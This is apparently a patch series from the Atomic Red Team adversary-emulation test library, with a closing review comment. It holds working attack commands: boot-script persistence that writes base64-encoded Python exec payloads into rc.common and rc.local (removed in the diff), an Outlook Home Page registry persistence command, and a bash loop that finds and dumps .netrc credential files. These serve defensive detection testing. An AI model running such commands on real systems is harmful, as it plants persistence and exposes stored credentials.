-## Atomic Test #1 - rc.common -Modify rc.common +## Atomic Test #1 - Install Outlook Home Page Persistence +This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. -[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) +Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). -**Supported Platforms:** macOS +**Supported Platforms:** Windows - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| +| outlook_version | Version of Outlook that is installed | string | 16.0| +| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox| -```bash -sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common -``` +#### Attack Commands: Run with `command_prompt`! - - - - -
-
- -## Atomic Test #2 - rc.common -Modify rc.common - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi -printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common -printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common -sudo chmod +x /etc/rc.common +```cmd +reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f ``` #### Cleanup Commands: -```bash -origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -``` - - - - - -
-
- -## Atomic Test #3 - rc.local -Modify rc.local - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi -printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local -printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local -sudo chmod +x /etc/rc.local -``` - -#### Cleanup Commands: -```bash -origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi +```cmd +reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f ``` From ecaa041b50e4cac1ac4076778f8bd028eec7eb74 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Jun 2021 17:23:39 +0000 Subject: [PATCH 10/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1552.001/T1552.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml index 6a2fc54e..3bfe6e15 100644 --- a/atomics/T1552.001/T1552.001.yaml +++ b/atomics/T1552.001/T1552.001.yaml @@ -54,6 +54,7 @@ atomic_tests: elevation_required: true - name: Find and Access Github Credentials + auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803 description: | This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e78c5f95..e9c19f64 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
@@ -708,3 +708,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 46f8dbe9-22a5-4770-8513-66119c5be63b c33f3d80-5f04-419b-a13a-854d1cbdbf3a 126f71af-e1c9-405c-94ef-26a47b16c102 +da4f751a-020b-40d7-b9ff-d433b7799803 From e7182cfe18f6fd664bcdeb9745365d4a9a5b0310 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 17:23:45 +0000 Subject: [PATCH 11/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + atomics/Indexes/Indexes-Markdown/linux-index.md | 1 + atomics/Indexes/Indexes-Markdown/macos-index.md | 1 + atomics/Indexes/index.yaml | 14 ++++++++++++++ 7 files changed, 20 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index fda6082f..da09d5a0 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -9,6 +9,7 @@ credential-access,T1552.001,Credentials In Files,1,Extract Browser and System cr credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt +credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 89eb46ca..d7c342f8 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -5,6 +5,7 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b- credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh +credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 987cd38e..721cf97b 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv 
@@ -2,6 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh +credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index e7646cfb..6c7e9586 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -21,6 +21,7 @@ - Atomic Test #2: Extract passwords with grep [macos, linux] - Atomic Test #3: Extracting passwords with findstr [windows] - Atomic Test #4: Access unattend.xml [windows] + - Atomic Test #5: Find and Access Github Credentials [macos, linux] - [T1555 Credentials from Password Stores](../../T1555/T1555.md) - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 6499f682..de2b75a9 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -14,6 +14,7 @@
 - T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
 - Atomic Test #2: Extract passwords with grep [macos, linux]
+ - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index baee6de3..215f549a 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -8,6 +8,7 @@
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
 - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
 - Atomic Test #2: Extract passwords with grep [macos, linux]
+ - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
 - Atomic Test #2: Search macOS Safari Cookies [macos]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 9500a007..35161db6 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -965,6 +965,20 @@ credential-access:
 type C:\Windows\Panther\Unattend\unattend.xml
 name: command_prompt
 elevation_required: true
+ - name: Find and Access Github Credentials
+ auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803
+ description: 'This test looks for .netrc files (which stores github credentials
+ in clear text )and dumps its contents if found.
+
+'
+ supported_platforms:
+ - macos
+ - linux
+ executor:
+ name: bash
+ elevation_required: false
+ command: "for file in $(find / -name .netrc 2> /dev/null);do echo $file ;
+ cat $file ; done \n"
 T1555:
 technique:
 id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0
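Review bot: The added `command` iterates `for file in $(find / -name .netrc 2> /dev/null)` and then uses `$file` unquoted in `echo $file ; cat $file`, so a match whose path contains whitespace is split into several words and the `cat` fails or reads the wrong path; a null-delimited loop is the robust form: `find / -name .netrc -print0 2> /dev/null | while IFS= read -r -d '' f; do echo "$f"; cat "$f"; done`. The description line `(which stores github credentials in clear text )and dumps its contents` has the space on the wrong side of the parenthesis, and .netrc holds machine credentials in general rather than only GitHub's, so `(which may store credentials such as GitHub tokens in clear text) and dumps their contents` would read more accurately. Since this index.yaml appears to be generated from the per-technique definition, both fixes presumably belong in the source test file (likely atomics/T1552.001/T1552.001.yaml, which is not in this chunk) with the indexes regenerated afterwards.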
